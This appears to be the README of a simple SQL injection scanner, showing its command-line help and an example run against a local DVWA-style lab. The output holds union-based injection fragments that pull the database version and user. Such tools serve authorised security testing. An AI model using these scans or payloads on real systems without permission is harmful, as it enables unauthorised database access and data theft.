Simple SQLi Vulnerability Scanner
pip install -r requirements.txt
$ ./simple_scanner_sqli.py -h
usage: simple_scanner_sqli.py [-h] [-l LOGIN_URL] [-ld LOGIN_DATA] -t TARGET
-ip INJECTION_PARAM [-rp REQUIRED_PARAMS]
[-c COOKIES]
Simple SQLi Vulnerability Scanner
optional arguments:
-h, --help show this help message and exit
-l LOGIN_URL, --login_url LOGIN_URL
Login URL
-ld LOGIN_DATA, --login_data LOGIN_DATA
Login fields as JSON stringe.g. '{"username": "foo",
"password": "bar"}'
-t TARGET, --target TARGET
Target endpoint
-ip INJECTION_PARAM, --injection_param INJECTION_PARAM
Target param for SQL injection
-rp REQUIRED_PARAMS, --required_params REQUIRED_PARAMS
JSON formatted string for any required params for
target e.g. '{"Submit": "Submit"}'
-c COOKIES, --cookies COOKIES
Cookies as JSON string e.g. '{"security": "low"}'
$ ./simple_scanner_sqli.py -l "http://127.0.0.1/login.php" -ld '{"username": "admin", "password": "password", "Login":"login"}' -t "http://127.0.0.1/vulnerabilities/sqli/" -ip "id" -rp '{"Submit": "Submit"}' -c '{"security": "low"}'
id: vulnerable to Error based exploitation
id: vulnerable to Union based exploitation
[u"UNION INJECTION: ', @@version) ,0 #<br>First name: UNION INJECTION: 5.1.41<br>Surname: 0</pre>\r", u"UNION INJECTION: ', user()) ,0 #<br>First name: UNION INJECTION: root@localhost<br>Surname: 0</pre>\r"]
id: vulnerable to Boolean based exploitation